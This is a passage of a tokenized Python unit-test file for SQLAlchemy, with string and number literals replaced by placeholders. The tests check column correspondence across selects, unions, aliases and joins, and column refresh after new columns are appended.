. bar . proxy_set <EOL> def test_no_error_on_unsupported_expr_key ( self ) : <EOL> from sqlalchemy . sql . 
expression import BinaryExpression <EOL> def myop ( x , y ) : <EOL> pass <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) , column ( '<STR_LIT:y>' ) ) <EOL> expr = BinaryExpression ( t . c . x , t . c . y , myop ) <EOL> s = select ( [ t , expr ] ) <EOL> eq_ ( <EOL> s . c . keys ( ) , <EOL> [ '<STR_LIT:x>' , '<STR_LIT:y>' , expr . anon_label ] <EOL> ) <EOL> def test_cloned_intersection ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> t2 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = t1 . select ( ) <EOL> s2 = t2 . select ( ) <EOL> s3 = t1 . select ( ) <EOL> s1c1 = s1 . _clone ( ) <EOL> s1c2 = s1 . _clone ( ) <EOL> s2c1 = s2 . _clone ( ) <EOL> s3c1 = s3 . _clone ( ) <EOL> eq_ ( <EOL> expression . _cloned_intersection ( <EOL> [ s1c1 , s3c1 ] , [ s2c1 , s1c2 ] <EOL> ) , <EOL> set ( [ s1c1 ] ) <EOL> ) <EOL> def test_cloned_difference ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> t2 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = t1 . select ( ) <EOL> s2 = t2 . select ( ) <EOL> s3 = t1 . select ( ) <EOL> s1c1 = s1 . _clone ( ) <EOL> s1c2 = s1 . _clone ( ) <EOL> s2c1 = s2 . _clone ( ) <EOL> s2c2 = s2 . _clone ( ) <EOL> s3c1 = s3 . _clone ( ) <EOL> eq_ ( <EOL> expression . _cloned_difference ( <EOL> [ s1c1 , s2c1 , s3c1 ] , [ s2c1 , s1c2 ] <EOL> ) , <EOL> set ( [ s3c1 ] ) <EOL> ) <EOL> def test_distance_on_aliases ( self ) : <EOL> a1 = table1 . alias ( '<STR_LIT>' ) <EOL> for s in ( select ( [ a1 , table1 ] , use_labels = True ) , <EOL> select ( [ table1 , a1 ] , use_labels = True ) ) : <EOL> assert s . corresponding_column ( table1 . c . col1 ) is s . c . table1_col1 <EOL> assert s . corresponding_column ( a1 . c . col1 ) is s . c . a1_col1 <EOL> def test_join_against_self ( self ) : <EOL> jj = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) ] ) <EOL> jjj = join ( table1 , jj , table1 . c . col1 == jj . c . bar_col1 ) <EOL> assert jjj . corresponding_column ( jjj . c . 
table1_col1 ) is jjj . c . table1_col1 <EOL> assert jjj . corresponding_column ( jj . c . bar_col1 ) is jjj . c . bar_col1 <EOL> j2 = jjj . alias ( '<STR_LIT:foo>' ) <EOL> assert j2 . corresponding_column ( table1 . c . col1 ) is j2 . c . table1_col1 <EOL> def test_clone_append_column ( self ) : <EOL> sel = select ( [ literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) ] ) <EOL> eq_ ( list ( sel . c . keys ( ) ) , [ '<STR_LIT:a>' ] ) <EOL> cloned = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> cloned . append_column ( literal_column ( '<STR_LIT:2>' ) . label ( '<STR_LIT:b>' ) ) <EOL> cloned . append_column ( func . foo ( ) ) <EOL> eq_ ( list ( cloned . c . keys ( ) ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT>' ] ) <EOL> def test_append_column_after_replace_selectable ( self ) : <EOL> basesel = select ( [ literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) ] ) <EOL> tojoin = select ( [ <EOL> literal_column ( '<STR_LIT:1>' ) . label ( '<STR_LIT:a>' ) , <EOL> literal_column ( '<STR_LIT:2>' ) . label ( '<STR_LIT:b>' ) <EOL> ] ) <EOL> basefrom = basesel . alias ( '<STR_LIT>' ) <EOL> joinfrom = tojoin . alias ( '<STR_LIT>' ) <EOL> sel = select ( [ basefrom . c . a ] ) <EOL> replaced = sel . replace_selectable ( <EOL> basefrom , <EOL> basefrom . join ( joinfrom , basefrom . c . a == joinfrom . c . a ) <EOL> ) <EOL> self . assert_compile ( <EOL> replaced , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> replaced . append_column ( joinfrom . c . b ) <EOL> self . assert_compile ( <EOL> replaced , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_against_cloned_non_table ( self ) : <EOL> col = func . count ( ) . label ( '<STR_LIT:foo>' ) <EOL> sel = select ( [ col ] ) <EOL> sel2 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> assert sel2 . corresponding_column ( col ) is sel2 . c . foo <EOL> sel3 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel2 ) <EOL> assert sel3 . 
corresponding_column ( col ) is sel3 . c . foo <EOL> def test_with_only_generative ( self ) : <EOL> s1 = table1 . select ( ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> s1 . with_only_columns ( [ s1 ] ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_type_coerce_preserve_subq ( self ) : <EOL> class MyType ( TypeDecorator ) : <EOL> impl = Integer <EOL> stmt = select ( [ type_coerce ( column ( '<STR_LIT:x>' ) , MyType ) . label ( '<STR_LIT:foo>' ) ] ) <EOL> stmt2 = stmt . select ( ) <EOL> assert isinstance ( stmt . _raw_columns [ <NUM_LIT:0> ] . type , MyType ) <EOL> assert isinstance ( stmt . c . foo . type , MyType ) <EOL> assert isinstance ( stmt2 . c . foo . type , MyType ) <EOL> def test_select_on_table ( self ) : <EOL> sel = select ( [ table1 , table2 ] , use_labels = True ) <EOL> assert sel . corresponding_column ( table1 . c . col1 ) is sel . c . table1_col1 <EOL> assert sel . corresponding_column ( <EOL> table1 . c . col1 , <EOL> require_embedded = True ) is sel . c . table1_col1 <EOL> assert table1 . corresponding_column ( sel . c . table1_col1 ) is table1 . c . col1 <EOL> assert table1 . corresponding_column ( sel . c . table1_col1 , <EOL> require_embedded = True ) is None <EOL> def test_join_against_join ( self ) : <EOL> j = outerjoin ( table1 , table2 , table1 . c . col1 == table2 . c . col2 ) <EOL> jj = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) ] , <EOL> from_obj = [ j ] ) . alias ( '<STR_LIT:foo>' ) <EOL> jjj = join ( table1 , jj , table1 . c . col1 == jj . c . bar_col1 ) <EOL> assert jjj . corresponding_column ( jjj . c . table1_col1 ) is jjj . c . table1_col1 <EOL> j2 = jjj . alias ( '<STR_LIT:foo>' ) <EOL> assert j2 . corresponding_column ( jjj . c . table1_col1 ) is j2 . c . table1_col1 <EOL> assert jjj . corresponding_column ( jj . c . bar_col1 ) is jj . c . bar_col1 <EOL> def test_table_alias ( self ) : <EOL> a = table1 . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . 
col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert u . corresponding_column ( s1 . c . table1_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_col2 ) is u . c . col2 <EOL> def test_union_precedence ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = select ( [ table1 . c . col2 , table1 . c . col1 ] ) <EOL> s3 = select ( [ table1 . c . col3 , table1 . c . colx ] ) <EOL> s4 = select ( [ table1 . c . colx , table1 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( table1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( table1 . c . col2 ) is u1 . c . col2 <EOL> u1 = union ( s1 , s2 , s3 , s4 ) <EOL> assert u1 . corresponding_column ( table1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( table1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( table1 . c . colx ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( table1 . c . col3 ) is u1 . c . col1 <EOL> def test_singular_union ( self ) : <EOL> u = union ( select ( [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) , select ( <EOL> [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) ) <EOL> u = union ( select ( [ table1 . c . col1 , table1 . c . col2 , table1 . c . col3 ] ) ) <EOL> assert u . c . col1 is not None <EOL> assert u . c . col2 is not None <EOL> assert u . c . 
col3 is not None <EOL> def test_alias_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert u . corresponding_column ( s1 . c . table1_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_col2 ) is u . c . col2 <EOL> assert u . corresponding_column ( s2 . c . table2_coly ) is u . c . coly <EOL> assert s2 . corresponding_column ( u . c . coly ) is s2 . c . table2_coly <EOL> def test_union_of_alias ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) . alias ( ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( s1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . col1 <EOL> u2 = union ( s2 , s1 ) <EOL> assert u2 . corresponding_column ( s1 . c . col1 ) is u2 . c . col1 <EOL> assert u2 . corresponding_column ( s2 . c . col1 ) is u2 . c . col1 <EOL> def test_union_of_text ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 ] ) <EOL> s2 = text ( "<STR_LIT>" ) . columns ( <EOL> column ( '<STR_LIT>' ) , column ( '<STR_LIT>' ) ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( s1 . c . col1 ) is u1 . c . col1 <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . col1 <EOL> u2 = union ( s2 , s1 ) <EOL> assert u2 . corresponding_column ( s1 . c . col1 ) is u2 . c . col1 <EOL> assert u2 . corresponding_column ( s2 . c . col1 ) is u2 . c . col1 <EOL> @ testing . 
emits_warning ( "<STR_LIT>" ) <EOL> def test_union_dupe_keys ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> @ testing . emits_warning ( "<STR_LIT>" ) <EOL> def test_union_alias_dupe_keys ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) . alias ( ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> @ testing . 
emits_warning ( "<STR_LIT>" ) <EOL> def test_union_alias_dupe_keys_grouped ( self ) : <EOL> s1 = select ( [ table1 . c . col1 , table1 . c . col2 , table2 . c . col1 ] ) . limit ( <NUM_LIT:1> ) . alias ( ) <EOL> s2 = select ( [ table2 . c . col1 , table2 . c . col2 , table2 . c . col3 ] ) . limit ( <NUM_LIT:1> ) <EOL> u1 = union ( s1 , s2 ) <EOL> assert u1 . corresponding_column ( <EOL> s1 . c . _all_columns [ <NUM_LIT:0> ] ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( s1 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col2 ) is u1 . c . col2 <EOL> assert u1 . corresponding_column ( s2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> assert u1 . corresponding_column ( table2 . c . col1 ) is u1 . c . _all_columns [ <NUM_LIT:0> ] <EOL> assert u1 . corresponding_column ( table2 . c . col3 ) is u1 . c . _all_columns [ <NUM_LIT:2> ] <EOL> def test_select_union ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> s = select ( [ u ] ) <EOL> s1 = table1 . select ( use_labels = True ) <EOL> s2 = table2 . select ( use_labels = True ) <EOL> assert s . corresponding_column ( s1 . c . table1_col2 ) is s . c . col2 <EOL> assert s . corresponding_column ( s2 . c . table2_col2 ) is s . c . col2 <EOL> def test_union_against_join ( self ) : <EOL> u = select ( [ table1 . c . col1 , <EOL> table1 . c . col2 , <EOL> table1 . c . col3 , <EOL> table1 . c . colx , <EOL> null ( ) . label ( '<STR_LIT>' ) ] ) . union ( select ( [ table2 . c . col1 , <EOL> table2 . c . col2 , <EOL> table2 . c . 
col3 , <EOL> null ( ) . label ( '<STR_LIT>' ) , <EOL> table2 . c . coly ] ) ) . alias ( '<STR_LIT>' ) <EOL> j1 = table1 . join ( table2 ) <EOL> assert u . corresponding_column ( j1 . c . table1_colx ) is u . c . colx <EOL> assert j1 . corresponding_column ( u . c . colx ) is j1 . c . table1_colx <EOL> def test_join ( self ) : <EOL> a = join ( table1 , table2 ) <EOL> print ( str ( a . select ( use_labels = True ) ) ) <EOL> b = table2 . alias ( '<STR_LIT:b>' ) <EOL> j = join ( a , b ) <EOL> print ( str ( j ) ) <EOL> criterion = a . c . table1_col1 == b . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_select_alias ( self ) : <EOL> a = table1 . select ( ) . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_select_labels ( self ) : <EOL> a = table1 . select ( use_labels = True ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . table1_col1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_scalar_cloned_comparator ( self ) : <EOL> sel = select ( [ table1 . c . col1 ] ) . as_scalar ( ) <EOL> expr = sel == table1 . c . col1 <EOL> sel2 = visitors . ReplacingCloningVisitor ( ) . traverse ( sel ) <EOL> expr2 = sel2 == table1 . c . col1 <EOL> is_ ( expr2 . left , sel2 ) <EOL> def test_column_labels ( self ) : <EOL> a = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) , <EOL> table1 . c . col2 . label ( '<STR_LIT>' ) , <EOL> table1 . c . col3 . label ( '<STR_LIT>' ) ] ) <EOL> j = join ( a , table2 ) <EOL> criterion = a . c . acol1 == table2 . c . col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_labeled_select_correspoinding ( self ) : <EOL> l1 = select ( [ func . max ( table1 . c . col1 ) ] ) . label ( '<STR_LIT:foo>' ) <EOL> s = select ( [ l1 ] ) <EOL> eq_ ( s . corresponding_column ( l1 ) , s . c . 
foo ) <EOL> s = select ( [ table1 . c . col1 , l1 ] ) <EOL> eq_ ( s . corresponding_column ( l1 ) , s . c . foo ) <EOL> def test_select_alias_labels ( self ) : <EOL> a = table2 . select ( use_labels = True ) . alias ( '<STR_LIT:a>' ) <EOL> j = join ( a , table1 ) <EOL> criterion = table1 . c . col1 == a . c . table2_col2 <EOL> self . assert_ ( criterion . compare ( j . onclause ) ) <EOL> def test_table_joined_to_select_of_table ( self ) : <EOL> metadata = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) ) <EOL> j2 = select ( [ a . c . id . label ( '<STR_LIT>' ) ] ) . alias ( '<STR_LIT:bar>' ) <EOL> j3 = a . join ( j2 , j2 . c . aid == a . c . id ) <EOL> j4 = select ( [ j3 ] ) . alias ( '<STR_LIT:foo>' ) <EOL> assert j4 . corresponding_column ( j2 . c . aid ) is j4 . c . aid <EOL> assert j4 . corresponding_column ( a . c . id ) is j4 . c . id <EOL> def test_two_metadata_join_raises ( self ) : <EOL> m = MetaData ( ) <EOL> m2 = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) , Column ( '<STR_LIT>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t3 = Table ( '<STR_LIT>' , m2 , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> s = select ( [ t2 , t3 ] , use_labels = True ) <EOL> assert_raises ( exc . NoReferencedTableError , s . join , t1 ) <EOL> def test_multi_label_chain_naming_col ( self ) : <EOL> l1 = table1 . c . col1 . label ( '<STR_LIT:a>' ) <EOL> l2 = select ( [ l1 ] ) . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l2 ] ) <EOL> assert s . c . b is not None <EOL> self . assert_compile ( <EOL> s . select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> s2 = select ( [ s . label ( '<STR_LIT:c>' ) ] ) <EOL> self . assert_compile ( <EOL> s2 . 
select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_self_referential_select_raises ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) ) <EOL> s = select ( [ t ] ) <EOL> s . append_whereclause ( s . c . x > <NUM_LIT:5> ) <EOL> assert_raises_message ( <EOL> exc . InvalidRequestError , <EOL> r"<STR_LIT>" , <EOL> s . compile <EOL> ) <EOL> def test_unusual_column_elements_text ( self ) : <EOL> """<STR_LIT>""" <EOL> s = select ( [ table1 . c . col1 , text ( "<STR_LIT:foo>" ) ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 ] <EOL> ) <EOL> def test_unusual_column_elements_clauselist ( self ) : <EOL> """<STR_LIT>""" <EOL> from sqlalchemy . sql . expression import ClauseList <EOL> s = select ( [ table1 . c . col1 , ClauseList ( table1 . c . col2 , table1 . c . col3 ) ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 , s . c . col2 , s . c . col3 ] <EOL> ) <EOL> def test_unusual_column_elements_boolean_clauselist ( self ) : <EOL> """<STR_LIT>""" <EOL> c2 = and_ ( table1 . c . col2 == <NUM_LIT:5> , table1 . c . col3 == <NUM_LIT:4> ) <EOL> s = select ( [ table1 . c . col1 , c2 ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 , s . corresponding_column ( c2 ) ] <EOL> ) <EOL> def test_from_list_deferred_constructor ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> eq_ ( c1 . _from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_whereclause ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) . where ( c1 == <NUM_LIT:5> ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> eq_ ( c1 . 
_from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_fromlist ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) . where ( c1 == <NUM_LIT:5> ) . select_from ( t1 ) <EOL> t2 = Table ( '<STR_LIT>' , MetaData ( ) , c1 ) <EOL> eq_ ( c1 . _from_objects , [ t2 ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_cloning ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> s2 = select ( [ c2 ] ) <EOL> s3 = sql_util . ClauseAdapter ( s ) . traverse ( s2 ) <EOL> Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> self . assert_compile ( <EOL> s3 , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_with_columns ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:a>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:b>' ) ) <EOL> s1 = select ( [ table1 . c . a , table2 . c . b ] ) <EOL> self . assert_compile ( s1 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s2 = s1 . with_only_columns ( [ table2 . c . b ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s3 = sql_util . ClauseAdapter ( table1 ) . traverse ( s1 ) <EOL> self . assert_compile ( s3 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s4 = s3 . with_only_columns ( [ table2 . c . b ] ) <EOL> self . assert_compile ( s4 , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_warning_against_existing ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> self . assert_compile ( <EOL> s , <EOL> "<STR_LIT>" <EOL> ) <EOL> Table ( '<STR_LIT:t>' , MetaData ( ) , c1 ) <EOL> self . 
assert_compile ( <EOL> s , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_recovers_after_warning ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> eq_ ( str ( s ) , "<STR_LIT>" ) <EOL> @ testing . emits_warning ( ) <EOL> def go ( ) : <EOL> return Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> t = go ( ) <EOL> eq_ ( c1 . _from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( s , "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c1 ] ) , "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , "<STR_LIT>" ) <EOL> def test_label_gen_resets_on_table ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> eq_ ( c1 . _label , "<STR_LIT>" ) <EOL> Table ( '<STR_LIT>' , MetaData ( ) , c1 ) <EOL> eq_ ( c1 . _label , "<STR_LIT>" ) <EOL> class RefreshForNewColTest ( fixtures . TestBase ) : <EOL> def test_join_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_join_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> j . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_join_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> j . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . 
b_x is q <EOL> def test_select_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_samename_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_irrelevant ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> c . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert '<STR_LIT>' not in s . c <EOL> def test_aliased_select_no_cols_clause ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s = select ( [ a . c . x ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert '<STR_LIT>' not in s . 
